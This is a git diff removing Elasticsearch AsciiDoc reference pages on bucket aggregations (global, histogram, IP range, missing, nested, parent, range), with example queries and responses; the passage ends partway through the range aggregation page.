a/docs/reference/aggregations/bucket/global-aggregation.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[search-aggregations-bucket-global-aggregation]] -=== Global aggregation -++++ -Global -++++ - -Defines a single bucket of all the documents within the search execution -context. This context is defined by the indices and the document types you're -searching on, but is *not* influenced by the search query itself. - -NOTE: Global aggregators can only be placed as top level aggregators because - it doesn't make sense to embed a global aggregator within another - bucket aggregator. 
- -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "match": { "type": "t-shirt" } - }, - "aggs": { - "all_products": { - "global": {}, <1> - "aggs": { <2> - "avg_price": { "avg": { "field": "price" } } - } - }, - "t_shirts": { "avg": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> The `global` aggregation has an empty body -<2> The sub-aggregations that are registered for this `global` aggregation - -The above aggregation demonstrates how one would compute aggregations -(`avg_price` in this example) on all the documents in the search context, -regardless of the query (in our example, it will compute the average price over -all products in our catalog, not just on the "shirts"). - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "all_products": { - "doc_count": 7, <1> - "avg_price": { - "value": 140.71428571428572 <2> - } - }, - "t_shirts": { - "value": 128.33333333333334 <3> - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The number of documents that were aggregated (in our case, all documents -within the search context) -<2> The average price of all products in the index -<3> The average price of all t-shirts diff --git a/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc deleted file mode 100644 index b8621f5c3ba..00000000000 --- a/docs/reference/aggregations/bucket/histogram-aggregation.asciidoc +++ /dev/null @@ -1,413 +0,0 @@ -[[search-aggregations-bucket-histogram-aggregation]] -=== Histogram aggregation -++++ -Histogram -++++ - -A multi-bucket values source based aggregation that can be applied on numeric values or numeric range values extracted -from the documents. It dynamically builds fixed size (a.k.a. interval) buckets over the values. For example, if the -documents have a field that holds a price (numeric), we can configure this aggregation to dynamically build buckets with -interval `5` (in case of price it may represent $5). When the aggregation executes, the price field of every document -will be evaluated and will be rounded down to its closest bucket - for example, if the price is `32` and the bucket size -is `5` then the rounding will yield `30` and thus the document will "fall" into the bucket that is associated with the -key `30`. -To make this more formal, here is the rounding function that is used: - -[source,java] --------------------------------------------------- -bucket_key = Math.floor((value - offset) / interval) * interval + offset --------------------------------------------------- - -For range values, a document can fall into multiple buckets. The first bucket is computed from the lower -bound of the range in the same way as a bucket for a single value is computed. The final bucket is computed in the same -way from the upper bound of the range, and the range is counted in all buckets in between and including those two. 
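-
-Expressed as a sketch (plain JavaScript mirroring the rounding function above,
-for illustration only, not the actual implementation), the bucketing of single
-values and of range values looks like this:
-
-[source,js]
---------------------------------------------------
-// Rounds a single value down to the key of the bucket it falls into.
-function bucketKey(value, interval, offset) {
-  return Math.floor((value - offset) / interval) * interval + offset;
-}
-
-bucketKey(32, 5, 0); // 30 -- the document lands in the bucket with key 30
-
-// A range value is counted in the bucket of its lower bound, the bucket of
-// its upper bound, and every bucket in between.
-function rangeBucketKeys(lower, upper, interval, offset) {
-  var keys = [];
-  for (var key = bucketKey(lower, interval, offset);
-       key <= bucketKey(upper, interval, offset);
-       key += interval) {
-    keys.push(key);
-  }
-  return keys;
-}
-
-rangeBucketKeys(50, 150, 50, 0); // [50, 100, 150]
---------------------------------------------------
-// NOTCONSOLE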
- -The `interval` must be a positive decimal, while the `offset` must be a decimal in `[0, interval)` -(a decimal greater than or equal to `0` and less than `interval`) - -The following snippet "buckets" the products based on their `price` by interval of `50`: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -And the following may be the response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 1 - }, - { - "key": 50.0, - "doc_count": 1 - }, - { - "key": 100.0, - "doc_count": 0 - }, - { - "key": 150.0, - "doc_count": 2 - }, - { - "key": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Minimum document count - -The response above show that no documents has a price that falls within the range of `[100, 150)`. By default the -response will fill gaps in the histogram with empty buckets. It is possible change that and request buckets with -a higher minimum count thanks to the `min_doc_count` setting: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "min_doc_count": 1 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 1 - }, - { - "key": 50.0, - "doc_count": 1 - }, - { - "key": 150.0, - "doc_count": 2 - }, - { - "key": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[search-aggregations-bucket-histogram-aggregation-extended-bounds]] -By default the `histogram` returns all the buckets within the range of the data itself, that is, the documents with -the smallest values (on which with histogram) will determine the min bucket (the bucket with the smallest key) and the -documents with the highest values will determine the max bucket (the bucket with the highest key). Often, when -requesting empty buckets, this causes a confusion, specifically, when the data is also filtered. - -To understand why, let's look at an example: - -Lets say the you're filtering your request to get all docs with values between `0` and `500`, in addition you'd like -to slice the data per price using a histogram with an interval of `50`. You also specify `"min_doc_count" : 0` as you'd -like to get all buckets even the empty ones. If it happens that all products (documents) have prices higher than `100`, -the first bucket you'll get will be the one with `100` as its key. This is confusing, as many times, you'd also like -to get those buckets between `0 - 100`. - -With `extended_bounds` setting, you now can "force" the histogram aggregation to start building buckets on a specific -`min` value and also keep on building buckets up to a `max` value (even if there are no documents anymore). 
Using -`extended_bounds` only makes sense when `min_doc_count` is 0 (the empty buckets will never be returned if `min_doc_count` -is greater than 0). - -Note that (as the name suggest) `extended_bounds` is **not** filtering buckets. Meaning, if the `extended_bounds.min` is higher -than the values extracted from the documents, the documents will still dictate what the first bucket will be (and the -same goes for the `extended_bounds.max` and the last bucket). For filtering buckets, one should nest the histogram aggregation -under a range `filter` aggregation with the appropriate `from`/`to` settings. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { "filter": { "range": { "price": { "to": "500" } } } } - }, - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "extended_bounds": { - "min": 0, - "max": 500 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -When aggregating ranges, buckets are based on the values of the returned documents. This means the response may include -buckets outside of a query's range. For example, if your query looks for values greater than 100, and you have a range -covering 50 to 150, and an interval of 50, that document will land in 3 buckets - 50, 100, and 150. In general, it's -best to think of the query and aggregation steps as independent - the query selects a set of documents, and then the -aggregation buckets those documents without regard to how they were selected. -See <> for more information and an example. - -[[search-aggregations-bucket-histogram-aggregation-hard-bounds]] -The `hard_bounds` is a counterpart of `extended_bounds` and can limit the range of buckets in the histogram. It is -particularly useful in the case of open <> that can result in a very large number of buckets. - -Example: - -[source,console,id=histogram-aggregation-hard-bounds-example] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "query": { - "constant_score": { "filter": { "range": { "price": { "to": "500" } } } } - }, - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "hard_bounds": { - "min": 100, - "max": 200 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In this example even though the range specified in the query is up to 500, the histogram will only have 2 buckets starting at 100 and 150. -All other buckets will be omitted even if documents that should go to this buckets are present in the results. - -==== Order - -By default the returned buckets are sorted by their `key` ascending, though the order behaviour can be controlled using -the `order` setting. Supports the same `order` functionality as the <>. - -==== Offset - -By default the bucket keys start with 0 and then continue in even spaced steps -of `interval`, e.g. if the interval is `10`, the first three buckets (assuming -there is data inside them) will be `[0, 10)`, `[10, 20)`, `[20, 30)`. The bucket -boundaries can be shifted by using the `offset` option. - -This can be best illustrated with an example. If there are 10 documents with values ranging from 5 to 14, using interval `10` will result in -two buckets with 5 documents each. If an additional offset `5` is used, there will be only one single bucket `[5, 15)` containing all the 10 -documents. 
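-
-The shift can be checked with the rounding function from the beginning of this
-page, sketched here in JavaScript for illustration only:
-
-[source,js]
---------------------------------------------------
-// bucket_key = Math.floor((value - offset) / interval) * interval + offset
-function bucketKey(value, interval, offset) {
-  return Math.floor((value - offset) / interval) * interval + offset;
-}
-
-// Interval 10, default offset 0: values between 5 and 14 split across two buckets.
-[5, 9, 10, 14].map(function (v) { return bucketKey(v, 10, 0); }); // [0, 0, 10, 10]
-
-// Interval 10, offset 5: the same values all share the single bucket [5, 15).
-[5, 9, 10, 14].map(function (v) { return bucketKey(v, 10, 5); }); // [5, 5, 5, 5]
---------------------------------------------------
-// NOTCONSOLE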
- -==== Response Format - -By default, the buckets are returned as an ordered array. It is also possible to request the response as a hash -instead keyed by the buckets keys: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "histogram": { - "field": "price", - "interval": 50, - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": { - "0.0": { - "key": 0.0, - "doc_count": 1 - }, - "50.0": { - "key": 50.0, - "doc_count": 1 - }, - "100.0": { - "key": 100.0, - "doc_count": 0 - }, - "150.0": { - "key": 150.0, - "doc_count": 2 - }, - "200.0": { - "key": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "quantity": { - "histogram": { - "field": "quantity", - "interval": 10, - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `quantity` field will fall into the same bucket as documents that have the value `0`. - -[[search-aggregations-bucket-histogram-aggregation-histogram-fields]] -==== Histogram fields - -Running a histogram aggregation over histogram fields computes the total number of counts for each interval. - -For example, executing a histogram aggregation against the following index that stores pre-aggregated histograms -with latency metrics (in milliseconds) for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [1, 3, 8, 12, 15], - "counts" : [3, 7, 23, 12, 6] - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [1, 6, 8, 12, 14], - "counts" : [8, 17, 8, 7, 6] - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs": { - "latency_buckets": { - "histogram": { - "field": "latency_histo", - "interval": 5 - } - } - } -} --------------------------------------------------- - - -The `histogram` aggregation will sum the counts of each interval computed based on the `values` and -return the following output: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "key": 0.0, - "doc_count": 18 - }, - { - "key": 5.0, - "doc_count": 48 - }, - { - "key": 10.0, - "doc_count": 25 - }, - { - "key": 15.0, - "doc_count": 6 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] - -[IMPORTANT] -======== -Histogram aggregation is a bucket aggregation, which partitions documents into buckets rather than calculating metrics over fields like -metrics aggregations do. Each bucket represents a collection of documents which sub-aggregations can run on. 
-On the other hand, a histogram field is a pre-aggregated field representing multiple values inside a single field: -buckets of numerical data and a count of items/documents for each bucket. This mismatch between the histogram aggregations expected input -(expecting raw documents) and the histogram field (that provides summary information) limits the outcome of the aggregation -to only the doc counts for each bucket. - - -**Consequently, when executing a histogram aggregation over a histogram field, no sub-aggregations are allowed.** -======== - -Also, when running histogram aggregation over histogram field the `missing` parameter is not supported. diff --git a/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc b/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc deleted file mode 100644 index d090eb9f42d..00000000000 --- a/docs/reference/aggregations/bucket/iprange-aggregation.asciidoc +++ /dev/null @@ -1,205 +0,0 @@ -[[search-aggregations-bucket-iprange-aggregation]] -=== IP range aggregation -++++ -IP range -++++ - -Just like the dedicated <> range aggregation, there is also a dedicated range aggregation for IP typed fields: - -Example: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 10, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "to": "10.0.0.5" }, - { "from": "10.0.0.5" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": [ - { - "key": "*-10.0.0.5", - "to": "10.0.0.5", - "doc_count": 10 - }, - { - "key": "10.0.0.5-*", - "from": "10.0.0.5", - "doc_count": 260 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -IP ranges can also be defined as CIDR masks: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "mask": "10.0.0.0/25" }, - { "mask": "10.0.0.127/25" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": [ - { - "key": "10.0.0.0/25", - "from": "10.0.0.0", - "to": "10.0.0.128", - "doc_count": 128 - }, - { - "key": "10.0.0.127/25", - "from": "10.0.0.0", - "to": "10.0.0.128", - "doc_count": 128 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "to": "10.0.0.5" }, - { "from": "10.0.0.5" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
- - "aggregations": { - "ip_ranges": { - "buckets": { - "*-10.0.0.5": { - "to": "10.0.0.5", - "doc_count": 10 - }, - "10.0.0.5-*": { - "from": "10.0.0.5", - "doc_count": 260 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -GET /ip_addresses/_search -{ - "size": 0, - "aggs": { - "ip_ranges": { - "ip_range": { - "field": "ip", - "ranges": [ - { "key": "infinity", "to": "10.0.0.5" }, - { "key": "and-beyond", "from": "10.0.0.5" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:iprange] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "ip_ranges": { - "buckets": { - "infinity": { - "to": "10.0.0.5", - "doc_count": 10 - }, - "and-beyond": { - "from": "10.0.0.5", - "doc_count": 260 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/missing-aggregation.asciidoc b/docs/reference/aggregations/bucket/missing-aggregation.asciidoc deleted file mode 100644 index 6c43e2ce49f..00000000000 --- a/docs/reference/aggregations/bucket/missing-aggregation.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[search-aggregations-bucket-missing-aggregation]] -=== Missing aggregation -++++ -Missing -++++ - -A field data based single bucket aggregation, that creates a bucket of all documents in the current document set context that are missing a field value (effectively, missing a field or having the configured NULL value set). This aggregator will often be used in conjunction with other field data bucket aggregators (such as ranges) to return information for all the documents that could not be placed in any of the other buckets due to missing field data values. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "products_without_a_price": { - "missing": { "field": "price" } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In the above example, we get the total number of products that do not have a price. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "products_without_a_price": { - "doc_count": 00 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] \ No newline at end of file diff --git a/docs/reference/aggregations/bucket/nested-aggregation.asciidoc b/docs/reference/aggregations/bucket/nested-aggregation.asciidoc deleted file mode 100644 index b45da2c1a09..00000000000 --- a/docs/reference/aggregations/bucket/nested-aggregation.asciidoc +++ /dev/null @@ -1,99 +0,0 @@ -[[search-aggregations-bucket-nested-aggregation]] -=== Nested aggregation -++++ -Nested -++++ - -A special single bucket aggregation that enables aggregating nested documents. - -For example, lets say we have an index of products, and each product holds the list of resellers - each having its own -price for the product. 
The mapping could look like: - -[source,console] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "resellers": { <1> - "type": "nested", - "properties": { - "reseller": { "type": "text" }, - "price": { "type": "double" } - } - } - } - } -} --------------------------------------------------- -<1> `resellers` is an array that holds nested documents. - -The following request adds a product with two resellers: - -[source,console] --------------------------------------------------- -PUT /products/_doc/0 -{ - "name": "LED TV", <1> - "resellers": [ - { - "reseller": "companyA", - "price": 350 - }, - { - "reseller": "companyB", - "price": 500 - } - ] -} --------------------------------------------------- -// TEST[s/PUT \/products\/_doc\/0/PUT \/products\/_doc\/0\?refresh/] -// TEST[continued] -<1> We are using a dynamic mapping for the `name` attribute. - - -The following request returns the minimum price a product can be purchased for: - -[source,console] --------------------------------------------------- -GET /products/_search -{ - "query": { - "match": { "name": "led tv" } - }, - "aggs": { - "resellers": { - "nested": { - "path": "resellers" - }, - "aggs": { - "min_price": { "min": { "field": "resellers.price" } } - } - } - } -} --------------------------------------------------- -// TEST[s/GET \/products\/_search/GET \/products\/_search\?filter_path=aggregations/] -// TEST[continued] - -As you can see above, the nested aggregation requires the `path` of the nested documents within the top level documents. -Then one can define any type of aggregation over these nested documents. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "resellers": { - "doc_count": 2, - "min_price": { - "value": 350 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: [0-9]+/: $body.$_path/] diff --git a/docs/reference/aggregations/bucket/parent-aggregation.asciidoc b/docs/reference/aggregations/bucket/parent-aggregation.asciidoc deleted file mode 100644 index 29892be17dc..00000000000 --- a/docs/reference/aggregations/bucket/parent-aggregation.asciidoc +++ /dev/null @@ -1,213 +0,0 @@ -[[search-aggregations-bucket-parent-aggregation]] -=== Parent aggregation -++++ -Parent -++++ - -A special single bucket aggregation that selects parent documents that have the specified type, as defined in a <>. - -This aggregation has a single option: - -* `type` - The child type that should be selected. - -For example, let's say we have an index of questions and answers. The answer type has the following `join` field in the mapping: - -[source,console] --------------------------------------------------- -PUT parent_example -{ - "mappings": { - "properties": { - "join": { - "type": "join", - "relations": { - "question": "answer" - } - } - } - } -} --------------------------------------------------- - -The `question` document contain a tag field and the `answer` documents contain an owner field. With the `parent` -aggregation the owner buckets can be mapped to the tag buckets in a single request even though the two fields exist in -two different kinds of documents. - -An example of a question document: - -[source,console] --------------------------------------------------- -PUT parent_example/_doc/1 -{ - "join": { - "name": "question" - }, - "body": "
I have Windows 2003 server and i bought a new Windows 2008 server...", - "title": "Whats the best way to file transfer my site from server to a newer one?", - "tags": [ - "windows-server-2003", - "windows-server-2008", - "file-transfer" - ] -} --------------------------------------------------- -// TEST[continued] - -Examples of `answer` documents: - -[source,console] --------------------------------------------------- -PUT parent_example/_doc/2?routing=1 -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Sam", - "id": 48 - }, - "body": "
Unfortunately you're pretty much limited to FTP...", - "creation_date": "2009-05-04T13:45:37.030" -} - -PUT parent_example/_doc/3?routing=1&refresh -{ - "join": { - "name": "answer", - "parent": "1" - }, - "owner": { - "location": "Norfolk, United Kingdom", - "display_name": "Troll", - "id": 49 - }, - "body": "
Use Linux...", - "creation_date": "2009-05-05T13:45:37.030" -} --------------------------------------------------- -// TEST[continued] - -The following request can be built that connects the two together: - -[source,console] --------------------------------------------------- -POST parent_example/_search?size=0 -{ - "aggs": { - "top-names": { - "terms": { - "field": "owner.display_name.keyword", - "size": 10 - }, - "aggs": { - "to-questions": { - "parent": { - "type" : "answer" <1> - }, - "aggs": { - "top-tags": { - "terms": { - "field": "tags.keyword", - "size": 10 - } - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The `type` points to type / mapping with the name `answer`. - -The above example returns the top answer owners and per owner the top question tags. - -Possible response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "top-names": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "Sam", - "doc_count": 1, <1> - "to-questions": { - "doc_count": 1, <2> - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1 - }, - { - "key": "windows-server-2003", - "doc_count": 1 - }, - { - "key": "windows-server-2008", - "doc_count": 1 - } - ] - } - } - }, - { - "key": "Troll", - "doc_count": 1, - "to-questions": { - "doc_count": 1, - "top-tags": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "file-transfer", - "doc_count": 1 - }, - { - "key": "windows-server-2003", - "doc_count": 1 - }, - { - "key": "windows-server-2008", - "doc_count": 1 - } - ] - } - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] - -<1> The number of answer documents with the tag `Sam`, `Troll`, etc. -<2> The number of question documents that are related to answer documents with the tag `Sam`, `Troll`, etc. diff --git a/docs/reference/aggregations/bucket/range-aggregation.asciidoc b/docs/reference/aggregations/bucket/range-aggregation.asciidoc deleted file mode 100644 index 3dc58721eae..00000000000 --- a/docs/reference/aggregations/bucket/range-aggregation.asciidoc +++ /dev/null @@ -1,384 +0,0 @@ -[[search-aggregations-bucket-range-aggregation]] -=== Range aggregation -++++ -Range -++++ - -A multi-bucket value source based aggregation that enables the user to define a set of ranges - each representing a bucket. During the aggregation process, the values extracted from each document will be checked against each bucket range and "bucket" the relevant/matching document. -Note that this aggregation includes the `from` value and excludes the `to` value for each range. 
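-
-In other words, a value `v` is placed in a range when `from <= v < to`, with a
-missing `from` or `to` treated as unbounded. As a sketch in JavaScript (for
-illustration only, not the actual implementation):
-
-[source,js]
---------------------------------------------------
-// `from` is inclusive, `to` is exclusive; either bound may be omitted.
-function inRange(value, from, to) {
-  return (from === undefined || value >= from)
-      && (to === undefined || value < to);
-}
-
-inRange(100.0, undefined, 100.0); // false -- 100 belongs to the next range
-inRange(100.0, 100.0, 200.0);     // true
---------------------------------------------------
-// NOTCONSOLE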
- -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 100.0 }, - { "from": 100.0, "to": 200.0 }, - { "from": 200.0 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "*-100.0", - "to": 100.0, - "doc_count": 2 - }, - { - "key": "100.0-200.0", - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - { - "key": "200.0-*", - "from": 200.0, - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "keyed": true, - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": { - "*-100.0": { - "to": 100.0, - "doc_count": 2 - }, - "100.0-200.0": { - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - "200.0-*": { - "from": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "keyed": true, - "ranges": [ - { "key": "cheap", "to": 100 }, - { "key": "average", "from": 100, "to": 200 }, - { "key": "expensive", "from": 200 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "price_ranges": { - "buckets": { - "cheap": { - "to": 100.0, - "doc_count": 2 - }, - "average": { - "from": 100.0, - "to": 200.0, - "doc_count": 2 - }, - "expensive": { - "from": 200.0, - "doc_count": 3 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -==== Script - -Range aggregation accepts a `script` parameter. This parameter allows to defined an inline `script` that -will be executed during aggregation execution. - -The following example shows how to use an `inline` script with the `painless` script language and no script parameters: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "script": { - "lang": "painless", - "source": "doc['price'].value" - }, - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - } - } - } -} --------------------------------------------------- - -It is also possible to use stored scripts. 
Here is a simple stored script: - -[source,console] --------------------------------------------------- -POST /_scripts/convert_currency -{ - "script": { - "lang": "painless", - "source": "doc[params.field].value * params.conversion_rate" - } -} --------------------------------------------------- -// TEST[setup:sales] - -And this new stored script can be used in the range aggregation like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "script": { - "id": "convert_currency", <1> - "params": { <2> - "field": "price", - "conversion_rate": 0.835526591 - } - }, - "ranges": [ - { "from": 0, "to": 100 }, - { "from": 100 } - ] - } - } - } -} --------------------------------------------------- -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] -// TEST[continued] -<1> Id of the stored script -<2> Parameters to use when executing the stored script - -////////////////////////// - -[source,console-result] --------------------------------------------------- -{ - "aggregations": { - "price_ranges": { - "buckets": [ - { - "key": "0.0-100.0", - "from": 0.0, - "to": 100.0, - "doc_count": 2 - }, - { - "key": "100.0-*", - "from": 100.0, - "doc_count": 5 - } - ] - } - } -} --------------------------------------------------- - -////////////////////////// - -==== Value Script - -Lets say the product prices are in USD but we would like to get the price ranges in EURO. We can use value script to convert the prices prior the aggregation (assuming conversion rate of 0.8) - -[source,console] --------------------------------------------------- -GET /sales/_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "script": { - "source": "_value * params.conversion_rate", - "params": { - "conversion_rate": 0.8 - } - }, - "ranges": [ - { "to": 35 }, - { "from": 35, "to": 70 }, - { "from": 70 } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Sub Aggregations - -The following example, not only "bucket" the documents to the different buckets but also computes statistics over the prices in each price range - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 200 }, - { "from": 200 } - ] - }, - "aggs": { - "price_stats": { - "stats": { "field": "price" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -// TEST[s/GET \/_search/GET \/_search\?filter_path=aggregations/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... 
